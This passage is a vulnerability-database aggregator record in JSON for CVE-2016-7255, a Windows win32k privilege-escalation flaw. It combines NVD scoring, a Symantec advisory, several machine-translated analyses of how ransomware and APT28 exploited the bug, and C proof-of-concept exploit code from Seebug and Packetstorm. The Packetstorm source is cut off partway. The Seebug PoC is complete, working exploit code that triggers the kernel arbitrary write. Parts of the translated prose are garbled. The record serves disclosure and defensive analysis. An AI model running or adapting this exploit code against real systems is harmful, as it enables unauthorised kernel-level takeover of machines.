"NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2016-7255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T12:02:45", "description": "If the Windows kernel-mode drivers do not properly handle objects in memory, then there will be multiple elevation of Privilege vulnerabilities. Successful exploitation of this vulnerability an attacker can run in kernel mode arbitrary code. An attacker could then install programs; view, change, or delete data; or create with full user permissions to the new account.\n\nThe attacker must first log in to the system, and then to exploit these vulnerabilities. Then the attacker can run a exploit these vulnerabilities and through the Special design of the application, allowing control of the affected system. The update addresses the vulnerabilities by correcting Windows kernel-mode driver handles objects in memory to resolve these vulnerabilities.\n", "published": "2016-11-10T00:00:00", "type": "seebug", "title": "Win32k elevation of privilege vulnerability MS16-135\uff09(CVE-2016-7255)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92530", "id": "SSV:92530", "sourceData": "\n // \u53c2\u8003 https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n\r\n do \r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\r\n va_start(VaList,Format);\r\n\r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n\r\n va_end(VaList);\r\n\r\n } while (FALSE);\r\n\r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n\r\n return ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n\r\n\r\n int nFinalRet = -1;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n\r\n Sleep(1000);\r\n\r\n }\r\n\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n\r\n return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n\r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n\r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n\r\n do \r\n {\r\n\r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n\r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n\r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n\r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n\r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n\r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n\r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n SetParent(hWndChild , GetDesktopWindow() );\r\n\r\n SetForegroundWindow(hWndChild);\r\n\r\n _sim_alt_shift_tab(4);\r\n\r\n SwitchToThisWindow(hWndChild , TRUE);\r\n\r\n _sim_alt_shift_esc();\r\n\r\n\r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n\r\n\r\n } while (FALSE);\r\n\r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n\r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n\r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n return 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do \r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92530"}], "symantec": [{"lastseen": "2018-03-14T22:39:48", "bulletinFamily": "software", "cvelist": ["CVE-2016-7255"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2016-11-08T00:00:00", "published": "2016-11-08T00:00:00", "id": "SMNTC-94064", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94064", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2016-7255 Local Privilege Escalation Vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-03-23T07:22:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "edition": 1, "description": "0x1 Foreword\n\n360 Internet Security Center recently captured a\u201cceber\u201dblackmailer Trojan variants, the variants with other\u201cceber\u201dblackmailer Trojan variants in the code The execution flow and not too big difference. Only it is worth noting that the Trojan exploit CVE-2016-7255 privilege elevation vulnerability on its own. right. This article will analyze the blackmailer for CVE-2016-7255 privilege elevation vulnerability in the use of the process.\n\n0x2 vulnerability details\n\nThe problem code is in win32k! xxxNextWindow, due to the lack of the necessary checks directly to the tagWND+0xC0 members offset 0x28 corresponding to the address of the value with 4 or operation, and tagWND+0xC0 is controllable, which leads to arbitrary address write. The vulnerable code is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417778. png)\n\nFigure 1 vulnerable code\n\nFig. v12 shows is tagWND structure, the structure as shown in omitted section.\n\n! [](/Article/UploadPic/2017-3/201732314417810. png)\n\nFigure 2 tagWND structure of the body\n\nFrom the above figure it can be seen, tagWND+0xC0 corresponds spmenu members, if there is a user state function can be the member of the assignment, you can trigger any address write. For 32-bit systems, you can directly call the SetWindowLong function SetWindowLong function will call the kernel mode function NtUserSetWindowLong the completion of this function; for 64-bit systems, does not exist you can use the user state function, but you can use the syscall of the way to call the kernel mode function NtUserSetWindowLong or function NtUserSetWindowLongPtr to complete this work. The following description is NtUserSetWindowLong function, NtUserSetWindowLongPtr the function execution process is the same.\n\nNtUserSetWindowLong function is just a shell, it will pass the parameter to the xxxSetWindowLong and call it, the function is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417836. png)\n\nFigure 3 xxxSetWindowLong function\n\nIn this function, the incoming nIndex judgment, and according to the nIndex value to perform the corresponding operation. For nIndex value of -16, and -20, and -12, and-21 situation, will call xxxSetWindowData function for processing. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417404. png)\n\nFigure 4 call xxxSetWindowData function for processing\n\nThe function receives xxxSetWindowLong of the parameters, when the nIndex parameter is-12 out of GWL_ID, and the operation of the window style is WS_CHILD or WS_CHILDWINDOW\uff080x40000000, will be the operation window tagWND structure spmenu members of the value set to dwNewLong it. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417349. png)\n\nFigure 5 The trigger of the position of vulnerability\n\nSince dwNewLong is to call NtUserSetWindowLong function when parameters are passed, the user mode process can use the syscall feel free to control it. And win32k! xxxNextWindow function of spmenu+0x28 members of With 4 or operation, thus triggering the arbitrary address write.\n\n0x3 exploit analysis\n\nFrom the vulnerability detail can be seen, the user mode process have to tagWND structure spmenu members the right to amend, the member is a tagMENU structure body, the structure is defined as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417245. png)\n\nFigure 6 tagMENU structure of the body\n\nNot difficult to see, xxxNextWindow function to modify the value is spmenu the fFlags member of the offset 0x28, and since the members with 0x4 or operation, and therefore the vulnerability can only be modified 1bit size of the area.\n\nYou can only modify 1bit on the surface it looks seemingly of little value, however this Trojan variant is not only to focus on this 1bit, but transferred to the tagWND structure of the cbWNDExtra member that represents the window the additional data size. If you can pass the Modify window the additional data size to cover the key address, and then re-use other way to write data, you can achieve perfect utilization.\n\nThen to complete the cbWNDExtra member of the write operation, it must obtain the cbWNDExtra member of the address or is the cbWNDExtra member relative to a known address offset. Except you must also obtain the additional address of the data or is relative to a known address offset to be calculated and written. For obtaining the cbWNDExtra member of the address, the Trojan creates two window\u201cExtraWnd1\u201dand\u201cExtraWND2\u201d, and the two Windows differs in its window class. cbWndExtra member that corresponds exactly to the tagWND the cbWNDExtra member. The program will be two window class. cbWndExtra members were assigned to 0x118 and 0x130, as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417654. png)\n\nFigure 7 create two Windows\n\nCreate a window after is to get the cbWNDExtra member of the tagWND structure of the offset, using HMValidateHandle function. The function and not in user mode export, but there's a user mode function IsMenu call it. Trojan horse determined by IsMenu related byte code of the location acquisition HMValidateHandle address.\n\n! [](/Article/UploadPic/2017-3/201732314417116. png)\n\nFigure 8 The use of byte-code positioning function\n\nHMValidateHandle function will leak tagWND structure of the content, so the Trojan can easily locate the cbWNDExtra member of the tagWND structure of the offset. For insurance purposes, the Trojan determines the two window tagWND structure of the cbWNDExtra member of the offset, when the two cbWNDExtra to register the window class to set the value of the 0x118 and 0x130 and offset are the same before the description of the offset effective.\n\n! [](/Article/UploadPic/2017-3/201732314417591. png)\n\n**[1] [[2]](<84568_2.htm>) [[3]](<84568_3.htm>) [next](<84568_2.htm>)**\n", "modified": "2017-03-23T00:00:00", "published": "2017-03-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84568.htm", "id": "MYHACK58:62201784568", "type": "myhack58", "title": "\u201ccerber\u201dblackmailer for CVE-2016-7255 exploit analysis-exploit warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-01T14:57:29", "bulletinFamily": "info", "cvelist": ["CVE-2016-7855", "CVE-2016-7255"], "edition": 1, "description": "The Windows kernel mention the right Vulnerability, CVE-2016-7255 has been a lot of media attention. In the 11 month's Patch Tuesday, Microsoft released for this vulnerability fix, as MS16-135 announcement of the part. According to Microsoft's description, CVE-2016-7255 mainly used to perform targeted attacks, and by some of the\u201cwild way\u201dto find samples. Google and Microsoft have confirmed that a Russian hacker group APT28 used a Flash Vulnerability, CVE-2016-7855 and this kernel mention the right vulnerability to perform a targeted attack, Google also released some for this vulnerability the discussion: \nhttps://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html \nhttps://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/ \nhttp://securityaffairs.co/wordpress/53242/hacking/cve-2016-7255-zero-day.html \nMcAfee Labs vulnerability research team spent a lot of time to analyze this vulnerability. In this article we will briefly discuss some of our findings. \nAnalysis \nWe first from MS16-135 patch to start the analysis, \u5f88\u5feb\u6211\u4eec\u5c31\u6ce8\u610f\u5230MS16-135\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u66f4\u65b0\u4e86win32k.sys so our next step is to start comparing through binary differential means two win32k. sys file to install the patch before and after it. In addition, our test system is running Windows 7, The version number is 6. 1. 7601. 23584\u3002 \nLook at the binary difference of the results, we note that the following function is modified. \n! [](/Article/UploadPic/2016-12/201612312262609. png? www. myhack58. com) \nFigure 1: in win32k. sys is to change the function-xxxNextWindow \nAfter these preliminary investigations we conclude that: CVE-2016-7255 to the patch fully applied to the repair win32k. sys in xxxNextWindow function. \nThe following screenshot shows a patch of xxxNextWindow(x, x)the change of a more advanced overview: \n! [](/Article/UploadPic/2016-12/201612312262532. png? www. myhack58. com) \nFigure 2: The function xxxNextWindow advanced differential results\nWe can see in the repair function to add some new logic, with a red highlight. Zoom in to the first newly inserted basic block, we can see the introduction of a new code to eax + 0x23 compares the value of the operation: \n! [](/Article/UploadPic/2016-12/201612312262346. png? www. myhack58. com) \nFigure 3: xxxNextWindow inserted into the first basic block\nThen, our next newly inserted basic block saw a similar logic. \n! [](/Article/UploadPic/2016-12/201612312262724. png? www. myhack58. com) \nFigure 4: xxxNextWindow inserted in the second basic block\nGoogle has stated that the vulnerability\u201ccan be obtained by win32k. sys system call NtSetWindowLongPtr()for GWL_STYLE set to WS_CHILD window handle on the index GWLP_ID trigger.\u201c \nIn fact, NtSetWindowLongPtr()only played trigger this vulnerability to the role, and the fundamental reason is that xxxNextWindow it. More specifically, by NtSetWindowLongPtr()to set inappropriate parameter can trigger xxxNextWindow in the\u201cany address write\u201dscene. \nNow let's look at the unpatched xxxNextWindow(x, x, ...)of the decompiled version. \n! [](/Article/UploadPic/2016-12/201612312262345. png? www. myhack58. com) \nFigure 5: unrepaired xxxNextWindow the decompiled version\nApply the patch after xxxNextWindow(x, x, ...)as shown below: \n! [](/Article/UploadPic/2016-12/201612312262846. png? www. myhack58. com) \nFigure 6: the repaired xxxNextWindow the decompiled version\nPatched after the code using a conditional branch statement\u201c(*(_BYTE *)(v8 + 0x23) &amp; 0xC0) != 0x40\u201denhanced parameter validation. \nIn this new statement, the variable v8 in eax is a GetNextQueueWindow call return value. \uff08See Figure\uff09 \n! [](/Article/UploadPic/2016-12/201612312262410. png? www. myhack58. com) \nFigure 7: variable v8 from the GetNextQueueWindow the call:\u201cv8 = _GetNextQueueWindow(v7, v31, 1);\u201d \nQuick View _GetNextQueueWindow(x, x, ...)is achieved, it reveals the function actually returns a pointer to the tagWND structure pointer. \nThe following figure shows the windbg in tagWND structure: \n! [](/Article/UploadPic/2016-12/201612312262587. png? www. myhack58. com) \nFigure 8: tagWND structure\nAnalyzing this code, we can get to know tagWND configuration offset 0x78 of the field is with the vulnerabilities associated. The following from a not repair function to decompile the lines of code confirms this: \n! [](/Article/UploadPic/2016-12/201612312262301. png? www. myhack58. com) \nFigure 9: unrepaired xxxNextWindow problems in the code\nNow the question becomes simple: if we can control in the v8+0x78 the value at the address, it is possible in the core region of an arbitrary address for a write operation, and it is likely you can achieve the mentioned rights. Fortunately, a user state of the API NtSetWindowLongPtr it can be used in this position is set to any value. \nThe following figure shows, we passed to the NtSetWindowLongPtr value, 0x41414141, is the reflection to the tagWND structure, through this vulnerability you can easily achieve arbitrary memory write. \n! [](/Article/UploadPic/2016-12/201612312262505. png? www. myhack58. com)\n\n**[1] [[2]](<82548_2.htm>) [next](<82548_2.htm>)**\n", "modified": "2016-12-31T00:00:00", "published": "2016-12-31T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82548.htm", "id": "MYHACK58:62201682548", "type": "myhack58", "title": "CVE-2016-7255: analysis of Mining the Windows kernel to mention the right vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T11:27:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "edition": 1, "description": "In 2015, FireEye released a Microsoft Office EPS\uff08Encapsulated PostScript in the two vulnerability details. Wherein, a is 0day vulnerabilities, one in the attack a few weeks before playing the patch. Recently, FireEye and Microsoft Office products in the discovery of three new 0day vulnerabilities, these vulnerabilities are being the attacker. \nIn 2017 at the end of 3, We detected another malicious file, which uses the EPS of the unknown vulnerabilities and the Windows Graphics Device Interface GDI in the recently patched vulnerability to deliver malicious software. Subsequently, Microsoft in the 2017 year 4 months to deactivate the EPS, but FireEye in EPS, and found a second unknown vulnerability. \nFireEye believes that there are two organizations Turla and another unknown financial criminal organizations is the use of the first EPS 0day Vulnerability CVE-2017-0261, and APT28, is to use the second EPS 0day Vulnerability CVE-2017-0262 and a new privilege escalation\uff08EOP\uff09 0day Vulnerability CVE-2017-0263 in. Turla and APT28 is Russian cyber espionage organizations, they will these 0day vulnerabilities applied to European Foreign and military Department. And this unidentified financial crime organizations are specifically targeted in the Middle East with offices of regional banks and global banks. In the following, we proceed with the introduction of EPS 0day vulnerabilities, related malware and new EOP 0day vulnerabilities. Each EPS 0day vulnerabilities are provided in the corresponding EOP exploit code, in order to provide the right, the code must bypass the sandbox, in order to perform the processing for the EPS FLTLDR. EXE instance. \nWe found that the malicious file is used for the delivery of three different payload. CVE-2017-0261 for delivery SHIRIME\uff08Turla and NETWIRE\uff08unknown financial crime organization, CVE-2017-0262 for delivery GAMEFISH\uff08APT28 it. CVE-2017-0263 for delivery GAMEFISH payload during the elevated privileges. \nFireEye the company's e-mail and network product detects these malicious files. \nIn these Vulnerability Information Disclosure, FireEye has been with the Microsoft Security Response Center MSRC for coordination. Microsoft recommends that all customers follow the security advice ADV170005 in the guidance, do a good job related security and Defense work. \nCVE-2017-0261--EPS\u201crestore\u201dUAF vulnerability \nOpen the Office document, FLTLDR. EXE will be used for rendering included the vulnerability of the embedded EPS image. Here the EPS file is a PostScript program, you can\u201crestore\u201doperation using the UAF vulnerability. \nAccording to the PostScript of the official Description:\u201ca local VM object allocation and the local VM in the existing objects of the modified called by the save and restore function is completed, in the name of the corresponding operation identifier, you can refer to them. save and restore can be used to package in the local VM in the PostScript language program related to the code. restore to be able to release the newly created object, and undo from the corresponding save operation after the existing object to modify.\u201d \nAs described above, the restore operation will be recovered from the save operation after the allocated memory. For the UAF vulnerability to say, when the forall operation of the combination, then it could not be better. Figure 1 shows the use of the save and restore operation of the pseudo-code. \n! [](/Article/UploadPic/2017-5/2017517184135487. png? www. myhack58. com) \nFigure 1: exploit the pseudo-code \nThe following operation allows the pseudo-code leaks the metadata, in order to achieve the Read/Write primitives: \n1\\. Create forall_proc array, only a single restore proc elements \n2\\. The EPS state is saved to eps_state \n3\\. In the Save created after the uaf_array \n4\\. Use forall operation to traverse uaf_array elements, for each element call forall_proc \n5\\. The uaf_array the first element is passed to the restore_proc of the call, the process contained in the forall_proc. \n6\\. restore_proc \nTo restore the initial state, the release uaf_array \nalloc_string process will be recycled to release the uaf_array \nforall_proc to call leak_proc \n7\\. forall operation of the follow-up calls for the recovery of uaf_array each element of the call leak_proc, these elements are now stored alloc_string the results of the process \nFigure 2 demonstrates in recovery after using uaf_array the debug log. \n! [](/Article/UploadPic/2017-5/2017517184136535. png? www. myhack58. com) \nFigure 2: uaf_array recycle the debug log \nThrough the operation of save operation after the identifier of the operation, the attacker can manipulate the memory layout, and the UAF vulnerability is converted to a read/write primitive. Figure 3 shows a forgery of the string, the length is set to 0x7fffffff, the cardinality is 0. \n! [](/Article/UploadPic/2017-5/2017517184136165. png? www. myhack58. com) \nFigure 3: Forge of the string object \nThe use of read and write arbitrary user memory capacity, The EPS program may further search the gadgets to build ROP chains, and create a file object. Figure 4 shows the in-memory fake file objects. \n! [](/Article/UploadPic/2017-5/2017517184136436. png? www. myhack58. com) \nFigure 4: with the ROP of the pseudo-file object \nBy Faking the file object call to closefile, the exploit code can be transferred to the ROP and start the shellcode with. Figure 5 shows closefile processing program part of the disassembly procedure. \n! [](/Article/UploadPic/2017-5/2017517184136717. png? www. myhack58. com) \nFigure 5: closefile Stack Pivot the disassembly code \nOnce executed, the malware will use the ROP chain to modify the stored shellcode memory region of the protection mechanisms. Thus, the shellcode will be able to perform FLTLDR. EXE running in a sandbox, and at the same time, in order to escape the sandbox detection, it also needs to further mention the right. \nAccording to FireEye found that the use of the vulnerability of the EPS program has two different versions. Wherein st07383. en17. docx using 32 or 64 bit version of CVE-2017-0001 to provide the right, and then perform a contains called SHIRIME malware inject the JavaScript payload. SHIRIME is Turla commonly used specially crafted JavaScript injector one, as the first stage of the payload into the target system, and implements the management and control functions. From the beginning of 2016 since we observed in the wild using the SHIRIME had many times revision, in this 0day vulnerability used in the attack was the latest version, v1. 0. 1004\uff09 \nThe second document Confirmation_letter. docx using 32 or 64 bit version of CVE-2016-7255 to mention the right, and then injected into the NETWIRE malware a new variant. According to our observation, the file is a different version of the file name is very similar. \nThese documents in the EPS program contains different logic to complete the ROP chain and shellcode construct. At the same time, it also uses a simple algorithm for the shellcode part of the obfuscation process, specifically as shown in Figure 6. \n\n\n**[1] [[2]](<86206_2.htm>) [[3]](<86206_3.htm>) [next](<86206_2.htm>)**\n", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "MYHACK58:62201786206", "href": "http://www.myhack58.com/Article/html/3/62/2017/86206.htm", "title": "For the APT organization to use the EPS vulnerabilities in and mention the right vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-01-12T02:03:22", "description": "", "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Kernel win32k.sys NtSetWindowLongPtr Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140468", "href": "https://packetstormsecurity.com/files/140468/Microsoft-Windows-Kernel-win32k.sys-NtSetWindowLongPtr-Privilege-Escalation.html", "sourceData": "`// ricklarabee.blogspot.com \n \n//This program is free software; you can redistribute it and/or \n//modify it under the terms of the GNU General Public License \n//as published by the Free Software Foundation. \n \n//This program is distributed in the hope that it will be useful, \n//but WITHOUT ANY WARRANTY; without even the implied warranty of \n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the \n//GNU General Public License for more details. \n \n//You should have received a copy of the GNU General Public License \n//along with this program; if not, write to the Free Software \n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. \n \n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 \n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n#pragma comment(lib, \"advapi32\") \n \nUINT64 PML4_BASE; \nUINT PML4_SELF_REF_INDEX; \nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; \n \n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) \n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n \n//////////////////////////////////////////////////////// \n// Define Data Types \n//////////////////////////////////////////////////////// \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; 